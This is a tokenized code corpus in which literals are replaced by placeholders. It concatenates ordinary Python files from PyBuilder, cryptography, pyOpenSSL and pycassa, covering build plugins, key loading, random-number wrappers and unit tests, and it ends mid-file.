<s> import string <EOL> from pybuilder . core import init , after , use_plugin <EOL> from pybuilder . utils import apply_on_files , read_file , write_file <EOL> use_plugin ( "<STR_LIT>" ) <EOL> @ init <EOL> def init_filter_resources_plugin ( project ) : <EOL> project . set_property_if_unset ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> project . set_property_if_unset ( "<STR_LIT>" , [ ] ) <EOL> @ after ( "<STR_LIT>" , only_once = True ) <EOL> def filter_resources ( project , logger ) : <EOL> globs = project . get_mandatory_property ( "<STR_LIT>" ) <EOL> if not globs : <EOL> logger . warn ( "<STR_LIT>" ) <EOL> return <EOL> target = project . expand_path ( "<STR_LIT>" ) <EOL> logger . info ( "<STR_LIT>" , "<STR_LIT:U+0020>" . join ( globs ) , target ) <EOL> project_dict_wrapper = ProjectDictWrapper ( project , logger ) <EOL> apply_on_files ( target , filter_resource , globs , project_dict_wrapper , logger ) <EOL> def filter_resource ( absolute_file_name , relative_file_name , dictionary , logger ) : <EOL> logger . debug ( "<STR_LIT>" , absolute_file_name ) <EOL> content = "<STR_LIT>" . join ( read_file ( absolute_file_name ) ) <EOL> filtered = string . Template ( content ) . safe_substitute ( dictionary ) <EOL> write_file ( absolute_file_name , filtered ) <EOL> class ProjectDictWrapper ( object ) : <EOL> def __init__ ( self , project , logger ) : <EOL> self . project = project <EOL> self . logger = logger <EOL> def __getitem__ ( self , key ) : <EOL> fallback_when_no_substitution_possible = "<STR_LIT>" % key <EOL> if hasattr ( self . project , key ) : <EOL> return getattr ( self . project , key ) <EOL> if self . project . has_property ( key ) : <EOL> return self . project . get_property ( key ) <EOL> self . logger . warn ( <EOL> "<STR_LIT>" . format ( key ) ) <EOL> return fallback_when_no_substitution_possible </s>
<s> from __future__ import unicode_literals <EOL> try : <EOL> from StringIO import StringIO <EOL> except ImportError as e : <EOL> from io import StringIO <EOL> import sys <EOL> import unittest <EOL> from pybuilder . core import init , task , description , use_plugin <EOL> from pybuilder . errors import BuildFailedException <EOL> from pybuilder . utils import discover_modules_matching , render_report , fork_process <EOL> from pybuilder . ci_server_interaction import test_proxy_for <EOL> from pybuilder . terminal import print_text_line <EOL> from types import MethodType , FunctionType <EOL> from functools import reduce <EOL> use_plugin ( "<STR_LIT>" ) <EOL> @ init <EOL> def init_test_source_directory ( project ) : <EOL> if sys . version_info [ : <NUM_LIT:2> ] <= ( <NUM_LIT:2> , <NUM_LIT:6> ) : <EOL> project . plugin_depends_on ( "<STR_LIT>" ) <EOL> else : <EOL> project . plugin_depends_on ( "<STR_LIT>" ) <EOL> project . set_property_if_unset ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> project . set_property_if_unset ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> project . set_property_if_unset ( "<STR_LIT>" , None ) <EOL> project . set_property_if_unset ( "<STR_LIT>" , None ) <EOL> project . set_property_if_unset ( "<STR_LIT>" , ( <EOL> lambda stream : __import__ ( "<STR_LIT>" ) . XMLTestRunner ( output = project . expand_path ( "<STR_LIT>" ) , <EOL> stream = stream ) , "<STR_LIT>" ) ) <EOL> @ task <EOL> @ description ( "<STR_LIT>" ) <EOL> def run_unit_tests ( project , logger ) : <EOL> run_tests ( project , logger , "<STR_LIT>" , "<STR_LIT>" ) <EOL> def run_tests ( project , logger , execution_prefix , execution_name ) : <EOL> logger . info ( "<STR_LIT>" , execution_name ) <EOL> if not project . get_property ( '<STR_LIT>' ) : <EOL> logger . 
debug ( "<STR_LIT>" , execution_name ) <EOL> exit_code , _ = fork_process ( logger , <EOL> target = do_run_tests , <EOL> args = ( <EOL> project , logger , execution_prefix , execution_name ) ) <EOL> if exit_code : <EOL> raise BuildFailedException ( <EOL> "<STR_LIT>" % ( execution_name , exit_code ) ) <EOL> else : <EOL> do_run_tests ( project , logger , execution_prefix , execution_name ) <EOL> def do_run_tests ( project , logger , execution_prefix , execution_name ) : <EOL> test_dir = _register_test_and_source_path_and_return_test_dir ( project , sys . path , execution_prefix ) <EOL> file_suffix = project . get_property ( "<STR_LIT>" % execution_prefix ) <EOL> if file_suffix is not None : <EOL> logger . warn ( <EOL> "<STR_LIT>" % { "<STR_LIT>" : execution_prefix } ) <EOL> module_glob = "<STR_LIT>" . format ( file_suffix ) <EOL> if module_glob . endswith ( "<STR_LIT>" ) : <EOL> WITHOUT_DOT_PY = slice ( <NUM_LIT:0> , - <NUM_LIT:3> ) <EOL> module_glob = module_glob [ WITHOUT_DOT_PY ] <EOL> project . set_property ( "<STR_LIT>" % execution_prefix , module_glob ) <EOL> else : <EOL> module_glob = project . get_property ( "<STR_LIT>" % execution_prefix ) <EOL> logger . info ( "<STR_LIT>" , execution_name , test_dir ) <EOL> logger . debug ( "<STR_LIT>" , module_glob ) <EOL> try : <EOL> test_method_prefix = project . get_property ( "<STR_LIT>" % execution_prefix ) <EOL> runner_generator = project . get_property ( "<STR_LIT>" % execution_prefix ) <EOL> result , console_out = execute_tests_matching ( runner_generator , logger , test_dir , module_glob , <EOL> test_method_prefix ) <EOL> if result . testsRun == <NUM_LIT:0> : <EOL> logger . warn ( "<STR_LIT>" , execution_name ) <EOL> else : <EOL> logger . info ( "<STR_LIT>" , result . testsRun , execution_name ) <EOL> write_report ( execution_prefix , project , logger , result , console_out ) <EOL> if not result . wasSuccessful ( ) : <EOL> raise BuildFailedException ( "<STR_LIT>" <EOL> % ( len ( result . errors ) , len ( result . 
failures ) , execution_name ) ) <EOL> logger . info ( "<STR_LIT>" , execution_name ) <EOL> except ImportError as e : <EOL> import traceback <EOL> _ , _ , import_error_traceback = sys . exc_info ( ) <EOL> file_with_error , error_line , _ , statement_causing_error = traceback . extract_tb ( import_error_traceback ) [ - <NUM_LIT:1> ] <EOL> logger . error ( "<STR_LIT>" . format ( <EOL> file_with_error , statement_causing_error , error_line ) ) <EOL> logger . error ( "<STR_LIT>" , execution_prefix , e ) <EOL> raise BuildFailedException ( "<STR_LIT>" % execution_name ) <EOL> def execute_tests ( runner_generator , logger , test_source , suffix , test_method_prefix = None ) : <EOL> return execute_tests_matching ( runner_generator , logger , test_source , "<STR_LIT>" . format ( suffix ) , test_method_prefix ) <EOL> def execute_tests_matching ( runner_generator , logger , test_source , file_glob , test_method_prefix = None ) : <EOL> output_log_file = StringIO ( ) <EOL> try : <EOL> test_modules = discover_modules_matching ( test_source , file_glob ) <EOL> loader = unittest . defaultTestLoader <EOL> if test_method_prefix : <EOL> loader . testMethodPrefix = test_method_prefix <EOL> tests = loader . loadTestsFromNames ( test_modules ) <EOL> result = _instrument_runner ( runner_generator , logger , _create_runner ( runner_generator , output_log_file ) ) . run ( <EOL> tests ) <EOL> return result , output_log_file . getvalue ( ) <EOL> finally : <EOL> output_log_file . close ( ) <EOL> def _create_runner ( runner_generator , output_log_file = None ) : <EOL> if ( isinstance ( runner_generator , list ) or isinstance ( runner_generator , tuple ) ) and len ( runner_generator ) > <NUM_LIT:1> : <EOL> runner_generator = runner_generator [ <NUM_LIT:0> ] <EOL> if not hasattr ( runner_generator , '<STR_LIT>' ) : <EOL> runner_generator = reduce ( getattr , runner_generator . split ( "<STR_LIT:.>" ) , sys . 
modules [ __name__ ] ) <EOL> return runner_generator ( stream = output_log_file ) <EOL> def _get_make_result_method_name ( runner_generator ) : <EOL> if ( isinstance ( runner_generator , list ) or isinstance ( runner_generator , tuple ) ) and len ( runner_generator ) > <NUM_LIT:1> : <EOL> method = runner_generator [ <NUM_LIT:1> ] <EOL> if type ( method ) == MethodType or type ( method ) == FunctionType : <EOL> method = method . __name__ <EOL> else : <EOL> method = "<STR_LIT>" <EOL> return method <EOL> def _instrument_runner ( runner_generator , logger , runner ) : <EOL> method_name = _get_make_result_method_name ( runner_generator ) <EOL> old_make_result = getattr ( runner , method_name ) <EOL> runner . logger = logger <EOL> def _instrumented_make_result ( self ) : <EOL> result = old_make_result ( ) <EOL> return _instrument_result ( logger , result ) <EOL> setattr ( runner , method_name , MethodType ( _instrumented_make_result , runner ) ) <EOL> return runner <EOL> def _instrument_result ( logger , result ) : <EOL> old_startTest = result . startTest <EOL> old_addError = result . addError <EOL> old_addFailure = result . addFailure <EOL> def startTest ( self , test ) : <EOL> self . test_names . append ( test ) <EOL> self . logger . debug ( "<STR_LIT>" , test ) <EOL> old_startTest ( test ) <EOL> def addError ( self , test , err ) : <EOL> exception_type , exception , traceback = err <EOL> self . failed_test_names_and_reasons [ test ] = '<STR_LIT>' . format ( exception_type , exception ) . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> old_addError ( test , err ) <EOL> def addFailure ( self , test , err ) : <EOL> exception_type , exception , traceback = err <EOL> self . failed_test_names_and_reasons [ test ] = '<STR_LIT>' . format ( exception_type , exception ) . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> old_addFailure ( test , err ) <EOL> result . startTest = MethodType ( startTest , result ) <EOL> result . addError = MethodType ( addError , result ) <EOL> result . 
addFailure = MethodType ( addFailure , result ) <EOL> result . test_names = [ ] <EOL> result . failed_test_names_and_reasons = { } <EOL> result . logger = logger <EOL> return result <EOL> def _register_test_and_source_path_and_return_test_dir ( project , system_path , execution_prefix ) : <EOL> test_dir = project . expand_path ( "<STR_LIT>" % execution_prefix ) <EOL> system_path . insert ( <NUM_LIT:0> , test_dir ) <EOL> system_path . insert ( <NUM_LIT:0> , project . expand_path ( "<STR_LIT>" ) ) <EOL> return test_dir <EOL> def write_report ( name , project , logger , result , console_out ) : <EOL> project . write_report ( "<STR_LIT:%s>" % name , console_out ) <EOL> report = { "<STR_LIT>" : result . testsRun , <EOL> "<STR_LIT>" : [ ] , <EOL> "<STR_LIT>" : [ ] } <EOL> for error in result . errors : <EOL> report [ "<STR_LIT>" ] . append ( { "<STR_LIT:test>" : error [ <NUM_LIT:0> ] . id ( ) , <EOL> "<STR_LIT>" : error [ <NUM_LIT:1> ] } ) <EOL> logger . error ( "<STR_LIT>" , error [ <NUM_LIT:0> ] . id ( ) ) <EOL> if project . get_property ( "<STR_LIT>" ) : <EOL> print_text_line ( error [ <NUM_LIT:1> ] ) <EOL> for failure in result . failures : <EOL> report [ "<STR_LIT>" ] . append ( { "<STR_LIT:test>" : failure [ <NUM_LIT:0> ] . id ( ) , <EOL> "<STR_LIT>" : failure [ <NUM_LIT:1> ] } ) <EOL> logger . error ( "<STR_LIT>" , failure [ <NUM_LIT:0> ] . id ( ) ) <EOL> if project . get_property ( "<STR_LIT>" ) : <EOL> print_text_line ( failure [ <NUM_LIT:1> ] ) <EOL> project . write_report ( "<STR_LIT>" % name , render_report ( report ) ) <EOL> report_to_ci_server ( project , result ) <EOL> def report_to_ci_server ( project , result ) : <EOL> for test_name in result . test_names : <EOL> with test_proxy_for ( project ) . and_test_name ( test_name ) as test : <EOL> if test_name in result . failed_test_names_and_reasons : <EOL> test . fails ( result . failed_test_names_and_reasons . get ( test_name ) ) </s>
<s> try : <EOL> TYPE_FILE = file <EOL> except NameError : <EOL> from io import FileIO as TYPE_FILE <EOL> import unittest <EOL> from test_utils import patch , Mock , MagicMock <EOL> from pybuilder . core import Project <EOL> from pybuilder . plugins . python . pycharm_plugin import ( <EOL> pycharm_generate , <EOL> _ensure_directory_present <EOL> ) <EOL> class PycharmPluginTests ( unittest . TestCase ) : <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_should_create_pycharm_directory_if_not_present ( self , os ) : <EOL> os . path . exists . return_value = False <EOL> _ensure_directory_present ( '<STR_LIT:foo>' ) <EOL> os . makedirs . assert_called_with ( '<STR_LIT:foo>' ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_should_not_create_pycharm_directory_if_present ( self , os ) : <EOL> os . path . exists . return_value = True <EOL> _ensure_directory_present ( '<STR_LIT:foo>' ) <EOL> self . assertFalse ( os . makedirs . called ) <EOL> @ patch ( '<STR_LIT>' , create = True ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_should_write_pycharm_file ( self , os , mock_open ) : <EOL> project = Project ( '<STR_LIT>' , name = '<STR_LIT>' ) <EOL> project . set_property ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> project . set_property ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> project . set_property ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> mock_open . return_value = MagicMock ( spec = TYPE_FILE ) <EOL> os . path . join . side_effect = lambda first , second : first + '<STR_LIT:/>' + second <EOL> pycharm_generate ( project , Mock ( ) ) <EOL> mock_open . assert_called_with ( '<STR_LIT>' , '<STR_LIT:w>' ) <EOL> metadata_file = mock_open . return_value . __enter__ . return_value <EOL> metadata_file . write . assert_called_with ( """<STR_LIT>""" ) </s>
<s> from __future__ import absolute_import , division , print_function <EOL> import abc <EOL> import base64 <EOL> import struct <EOL> from enum import Enum <EOL> import six <EOL> from cryptography import utils <EOL> from cryptography . exceptions import UnsupportedAlgorithm <EOL> from cryptography . hazmat . primitives . asymmetric import dsa , ec , rsa <EOL> def load_pem_private_key ( data , password , backend ) : <EOL> return backend . load_pem_private_key ( data , password ) <EOL> def load_pem_public_key ( data , backend ) : <EOL> return backend . load_pem_public_key ( data ) <EOL> def load_der_private_key ( data , password , backend ) : <EOL> return backend . load_der_private_key ( data , password ) <EOL> def load_der_public_key ( data , backend ) : <EOL> return backend . load_der_public_key ( data ) <EOL> def load_ssh_public_key ( data , backend ) : <EOL> key_parts = data . split ( b'<STR_LIT:U+0020>' , <NUM_LIT:2> ) <EOL> if len ( key_parts ) < <NUM_LIT:2> : <EOL> raise ValueError ( <EOL> '<STR_LIT>' ) <EOL> key_type = key_parts [ <NUM_LIT:0> ] <EOL> if key_type == b'<STR_LIT>' : <EOL> loader = _load_ssh_rsa_public_key <EOL> elif key_type == b'<STR_LIT>' : <EOL> loader = _load_ssh_dss_public_key <EOL> elif key_type in [ <EOL> b'<STR_LIT>' , b'<STR_LIT>' , b'<STR_LIT>' , <EOL> ] : <EOL> loader = _load_ssh_ecdsa_public_key <EOL> else : <EOL> raise UnsupportedAlgorithm ( '<STR_LIT>' ) <EOL> key_body = key_parts [ <NUM_LIT:1> ] <EOL> try : <EOL> decoded_data = base64 . 
b64decode ( key_body ) <EOL> except TypeError : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> inner_key_type , rest = _read_next_string ( decoded_data ) <EOL> if inner_key_type != key_type : <EOL> raise ValueError ( <EOL> '<STR_LIT>' <EOL> ) <EOL> return loader ( key_type , rest , backend ) <EOL> def _load_ssh_rsa_public_key ( key_type , decoded_data , backend ) : <EOL> e , rest = _read_next_mpint ( decoded_data ) <EOL> n , rest = _read_next_mpint ( rest ) <EOL> if rest : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> return rsa . RSAPublicNumbers ( e , n ) . public_key ( backend ) <EOL> def _load_ssh_dss_public_key ( key_type , decoded_data , backend ) : <EOL> p , rest = _read_next_mpint ( decoded_data ) <EOL> q , rest = _read_next_mpint ( rest ) <EOL> g , rest = _read_next_mpint ( rest ) <EOL> y , rest = _read_next_mpint ( rest ) <EOL> if rest : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> parameter_numbers = dsa . DSAParameterNumbers ( p , q , g ) <EOL> public_numbers = dsa . DSAPublicNumbers ( y , parameter_numbers ) <EOL> return public_numbers . public_key ( backend ) <EOL> def _load_ssh_ecdsa_public_key ( expected_key_type , decoded_data , backend ) : <EOL> curve_name , rest = _read_next_string ( decoded_data ) <EOL> data , rest = _read_next_string ( rest ) <EOL> if expected_key_type != b"<STR_LIT>" + curve_name : <EOL> raise ValueError ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if rest : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> curve = { <EOL> b"<STR_LIT>" : ec . SECP256R1 , <EOL> b"<STR_LIT>" : ec . SECP384R1 , <EOL> b"<STR_LIT>" : ec . SECP521R1 , <EOL> } [ curve_name ] ( ) <EOL> if six . indexbytes ( data , <NUM_LIT:0> ) != <NUM_LIT:4> : <EOL> raise NotImplementedError ( <EOL> "<STR_LIT>" <EOL> ) <EOL> numbers = ec . EllipticCurvePublicNumbers . from_encoded_point ( curve , data ) <EOL> return numbers . 
public_key ( backend ) <EOL> def _read_next_string ( data ) : <EOL> """<STR_LIT>""" <EOL> if len ( data ) < <NUM_LIT:4> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> str_len , = struct . unpack ( '<STR_LIT>' , data [ : <NUM_LIT:4> ] ) <EOL> if len ( data ) < str_len + <NUM_LIT:4> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> return data [ <NUM_LIT:4> : <NUM_LIT:4> + str_len ] , data [ <NUM_LIT:4> + str_len : ] <EOL> def _read_next_mpint ( data ) : <EOL> """<STR_LIT>""" <EOL> mpint_data , rest = _read_next_string ( data ) <EOL> return ( <EOL> utils . int_from_bytes ( mpint_data , byteorder = '<STR_LIT>' , signed = False ) , rest <EOL> ) <EOL> class Encoding ( Enum ) : <EOL> PEM = "<STR_LIT>" <EOL> DER = "<STR_LIT>" <EOL> class PrivateFormat ( Enum ) : <EOL> PKCS8 = "<STR_LIT>" <EOL> TraditionalOpenSSL = "<STR_LIT>" <EOL> class PublicFormat ( Enum ) : <EOL> SubjectPublicKeyInfo = "<STR_LIT>" <EOL> PKCS1 = "<STR_LIT>" <EOL> @ six . add_metaclass ( abc . ABCMeta ) <EOL> class KeySerializationEncryption ( object ) : <EOL> pass <EOL> @ utils . register_interface ( KeySerializationEncryption ) <EOL> class BestAvailableEncryption ( object ) : <EOL> def __init__ ( self , password ) : <EOL> if not isinstance ( password , bytes ) or len ( password ) == <NUM_LIT:0> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> self . password = password <EOL> @ utils . register_interface ( KeySerializationEncryption ) <EOL> class NoEncryption ( object ) : <EOL> pass </s>
<s> from __future__ import absolute_import , division , print_function <EOL> import pytest <EOL> from cryptography . hazmat . primitives . asymmetric import dh <EOL> def test_dh_parameternumbers ( ) : <EOL> params = dh . DHParameterNumbers ( <EOL> <NUM_LIT> , <NUM_LIT:3> <EOL> ) <EOL> assert params . p == <NUM_LIT> <EOL> assert params . g == <NUM_LIT:3> <EOL> with pytest . raises ( TypeError ) : <EOL> dh . DHParameterNumbers ( <EOL> None , <NUM_LIT:3> <EOL> ) <EOL> with pytest . raises ( TypeError ) : <EOL> dh . DHParameterNumbers ( <EOL> <NUM_LIT> , None <EOL> ) <EOL> with pytest . raises ( TypeError ) : <EOL> dh . DHParameterNumbers ( <EOL> None , None <EOL> ) <EOL> def test_dh_numbers ( ) : <EOL> params = dh . DHParameterNumbers ( <EOL> <NUM_LIT> , <NUM_LIT:3> <EOL> ) <EOL> public = dh . DHPublicNumbers ( <EOL> <NUM_LIT:1> , params <EOL> ) <EOL> assert public . parameter_numbers is params <EOL> assert public . y == <NUM_LIT:1> <EOL> with pytest . raises ( TypeError ) : <EOL> dh . DHPublicNumbers ( <EOL> <NUM_LIT:1> , None <EOL> ) <EOL> with pytest . raises ( TypeError ) : <EOL> dh . DHPublicNumbers ( <EOL> None , params <EOL> ) <EOL> private = dh . DHPrivateNumbers ( <EOL> <NUM_LIT:1> , public <EOL> ) <EOL> assert private . public_numbers is public <EOL> assert private . x == <NUM_LIT:1> <EOL> with pytest . raises ( TypeError ) : <EOL> dh . DHPrivateNumbers ( <EOL> <NUM_LIT:1> , None <EOL> ) <EOL> with pytest . raises ( TypeError ) : <EOL> dh . DHPrivateNumbers ( <EOL> None , public <EOL> ) <EOL> def test_dh_parameter_numbers_equality ( ) : <EOL> assert dh . DHParameterNumbers ( <NUM_LIT> , <NUM_LIT:3> ) == dh . DHParameterNumbers ( <NUM_LIT> , <NUM_LIT:3> ) <EOL> assert dh . DHParameterNumbers ( <NUM_LIT:6> , <NUM_LIT:3> ) != dh . DHParameterNumbers ( <NUM_LIT> , <NUM_LIT:3> ) <EOL> assert dh . DHParameterNumbers ( <NUM_LIT> , <NUM_LIT:0> ) != dh . DHParameterNumbers ( <NUM_LIT> , <NUM_LIT:3> ) <EOL> assert dh . 
DHParameterNumbers ( <NUM_LIT> , <NUM_LIT:0> ) != object ( ) <EOL> def test_dh_private_numbers_equality ( ) : <EOL> params = dh . DHParameterNumbers ( <NUM_LIT> , <NUM_LIT:3> ) <EOL> public = dh . DHPublicNumbers ( <NUM_LIT:1> , params ) <EOL> private = dh . DHPrivateNumbers ( <NUM_LIT:2> , public ) <EOL> assert private == dh . DHPrivateNumbers ( <NUM_LIT:2> , public ) <EOL> assert private != dh . DHPrivateNumbers ( <NUM_LIT:0> , public ) <EOL> assert private != dh . DHPrivateNumbers ( <NUM_LIT:2> , dh . DHPublicNumbers ( <NUM_LIT:0> , params ) ) <EOL> assert private != dh . DHPrivateNumbers ( <EOL> <NUM_LIT:2> , dh . DHPublicNumbers ( <NUM_LIT:1> , dh . DHParameterNumbers ( <NUM_LIT> , <NUM_LIT:0> ) ) <EOL> ) <EOL> assert private != object ( ) <EOL> def test_dh_public_numbers_equality ( ) : <EOL> params = dh . DHParameterNumbers ( <NUM_LIT> , <NUM_LIT:3> ) <EOL> public = dh . DHPublicNumbers ( <NUM_LIT:1> , params ) <EOL> assert public == dh . DHPublicNumbers ( <NUM_LIT:1> , params ) <EOL> assert public != dh . DHPublicNumbers ( <NUM_LIT:0> , params ) <EOL> assert public != dh . DHPublicNumbers ( <NUM_LIT:1> , dh . DHParameterNumbers ( <NUM_LIT> , <NUM_LIT:0> ) ) <EOL> assert public != object ( ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import warnings <EOL> from functools import partial <EOL> from six import integer_types as _integer_types <EOL> from OpenSSL . _util import ( <EOL> ffi as _ffi , <EOL> lib as _lib , <EOL> exception_from_error_queue as _exception_from_error_queue , <EOL> path_string as _path_string ) <EOL> class Error ( Exception ) : <EOL> """<STR_LIT>""" <EOL> _raise_current_error = partial ( _exception_from_error_queue , Error ) <EOL> _unspecified = object ( ) <EOL> _builtin_bytes = bytes <EOL> def bytes ( num_bytes ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( num_bytes , _integer_types ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> if num_bytes < <NUM_LIT:0> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> result_buffer = _ffi . new ( "<STR_LIT>" , num_bytes ) <EOL> result_code = _lib . RAND_bytes ( result_buffer , num_bytes ) <EOL> if result_code == - <NUM_LIT:1> : <EOL> _raise_current_error ( ) <EOL> return _ffi . buffer ( result_buffer ) [ : ] <EOL> def add ( buffer , entropy ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( buffer , _builtin_bytes ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> if not isinstance ( entropy , int ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> _lib . RAND_add ( buffer , len ( buffer ) , entropy ) <EOL> def seed ( buffer ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( buffer , _builtin_bytes ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> _lib . RAND_seed ( buffer , len ( buffer ) ) <EOL> def status ( ) : <EOL> """<STR_LIT>""" <EOL> return _lib . RAND_status ( ) <EOL> def egd ( path , bytes = _unspecified ) : <EOL> """<STR_LIT>""" <EOL> warnings . warn ( "<STR_LIT>" , <EOL> DeprecationWarning ) <EOL> if not isinstance ( path , _builtin_bytes ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> if bytes is _unspecified : <EOL> bytes = <NUM_LIT:255> <EOL> elif not isinstance ( bytes , int ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> seed ( os . 
urandom ( bytes ) ) <EOL> return bytes <EOL> def cleanup ( ) : <EOL> """<STR_LIT>""" <EOL> _lib . RAND_cleanup ( ) <EOL> def load_file ( filename , maxbytes = _unspecified ) : <EOL> """<STR_LIT>""" <EOL> filename = _path_string ( filename ) <EOL> if maxbytes is _unspecified : <EOL> maxbytes = - <NUM_LIT:1> <EOL> elif not isinstance ( maxbytes , int ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> return _lib . RAND_load_file ( filename , maxbytes ) <EOL> def write_file ( filename ) : <EOL> """<STR_LIT>""" <EOL> filename = _path_string ( filename ) <EOL> return _lib . RAND_write_file ( filename ) <EOL> def screen ( ) : <EOL> """<STR_LIT>""" <EOL> _lib . RAND_screen ( ) <EOL> if getattr ( _lib , '<STR_LIT>' , None ) is None : <EOL> del screen <EOL> _lib . ERR_load_RAND_strings ( ) </s>
<s> import unittest <EOL> import time <EOL> from nose . tools import assert_raises , assert_equal , assert_true <EOL> from pycassa import index , ColumnFamily , ConnectionPool , NotFoundException <EOL> from pycassa . contrib . stubs import ColumnFamilyStub , ConnectionPoolStub <EOL> from pycassa . util import convert_time_to_uuid <EOL> pool = cf = indexed_cf = None <EOL> pool_stub = cf_stub = indexed_cf_stub = None <EOL> def setup_module ( ) : <EOL> global pool , cf , indexed_cf , pool_stub , indexed_cf_stub , cf_stub <EOL> credentials = { '<STR_LIT:username>' : '<STR_LIT>' , '<STR_LIT:password>' : '<STR_LIT>' } <EOL> pool = ConnectionPool ( keyspace = '<STR_LIT>' , <EOL> credentials = credentials , timeout = <NUM_LIT:1.0> ) <EOL> cf = ColumnFamily ( pool , '<STR_LIT>' , dict_class = TestDict ) <EOL> indexed_cf = ColumnFamily ( pool , '<STR_LIT>' ) <EOL> pool_stub = ConnectionPoolStub ( keyspace = '<STR_LIT>' , <EOL> credentials = credentials , timeout = <NUM_LIT:1.0> ) <EOL> cf_stub = ColumnFamilyStub ( pool_stub , '<STR_LIT>' , dict_class = TestDict ) <EOL> indexed_cf_stub = ColumnFamilyStub ( pool_stub , '<STR_LIT>' ) <EOL> def teardown_module ( ) : <EOL> cf . truncate ( ) <EOL> cf_stub . truncate ( ) <EOL> indexed_cf . truncate ( ) <EOL> indexed_cf_stub . truncate ( ) <EOL> pool . dispose ( ) <EOL> class TestDict ( dict ) : <EOL> pass <EOL> class TestColumnFamilyStub ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> pass <EOL> def tearDown ( self ) : <EOL> for test_cf in ( cf , cf_stub ) : <EOL> for key , columns in test_cf . get_range ( ) : <EOL> test_cf . remove ( key ) <EOL> def test_empty ( self ) : <EOL> key = '<STR_LIT>' <EOL> for test_cf in ( cf , cf_stub ) : <EOL> assert_raises ( NotFoundException , test_cf . get , key ) <EOL> assert_equal ( len ( test_cf . multiget ( [ key ] ) ) , <NUM_LIT:0> ) <EOL> for key , columns in test_cf . 
get_range ( ) : <EOL> assert_equal ( len ( columns ) , <NUM_LIT:0> ) <EOL> def test_insert_get ( self ) : <EOL> key = '<STR_LIT>' <EOL> columns = { '<STR_LIT:1>' : '<STR_LIT>' , '<STR_LIT:2>' : '<STR_LIT>' } <EOL> for test_cf in ( cf , cf_stub ) : <EOL> assert_raises ( NotFoundException , test_cf . get , key ) <EOL> ts = test_cf . insert ( key , columns ) <EOL> assert_true ( isinstance ( ts , ( int , long ) ) ) <EOL> assert_equal ( test_cf . get ( key ) , columns ) <EOL> def test_insert_get_column_start_and_finish_reversed ( self ) : <EOL> key = '<STR_LIT>' <EOL> columns = { '<STR_LIT:1>' : '<STR_LIT>' , '<STR_LIT:2>' : '<STR_LIT>' } <EOL> for test_cf in ( cf , cf_stub ) : <EOL> assert_raises ( NotFoundException , test_cf . get , key ) <EOL> ts = test_cf . insert ( key , columns ) <EOL> assert_true ( isinstance ( ts , ( int , long ) ) ) <EOL> test_cf . get ( key , column_reversed = True ) <EOL> def test_insert_get_column_start_and_finish ( self ) : <EOL> key = '<STR_LIT>' <EOL> columns = { '<STR_LIT:a>' : '<STR_LIT>' , '<STR_LIT:b>' : '<STR_LIT>' , '<STR_LIT:c>' : '<STR_LIT>' , '<STR_LIT:d>' : '<STR_LIT>' } <EOL> for test_cf in ( cf , cf_stub ) : <EOL> assert_raises ( NotFoundException , test_cf . get , key ) <EOL> ts = test_cf . insert ( key , columns ) <EOL> assert_true ( isinstance ( ts , ( int , long ) ) ) <EOL> assert_equal ( test_cf . get ( key , column_start = '<STR_LIT:b>' , column_finish = '<STR_LIT:c>' ) , { '<STR_LIT:b>' : '<STR_LIT>' , '<STR_LIT:c>' : '<STR_LIT>' } ) <EOL> def test_insert_get_column_start_and_reversed ( self ) : <EOL> key = '<STR_LIT>' <EOL> columns = { '<STR_LIT:a>' : '<STR_LIT>' , '<STR_LIT:b>' : '<STR_LIT>' , '<STR_LIT:c>' : '<STR_LIT>' , '<STR_LIT:d>' : '<STR_LIT>' } <EOL> for test_cf in ( cf , cf_stub ) : <EOL> assert_raises ( NotFoundException , test_cf . get , key ) <EOL> ts = test_cf . insert ( key , columns ) <EOL> assert_true ( isinstance ( ts , ( int , long ) ) ) <EOL> assert_equal ( test_cf . 
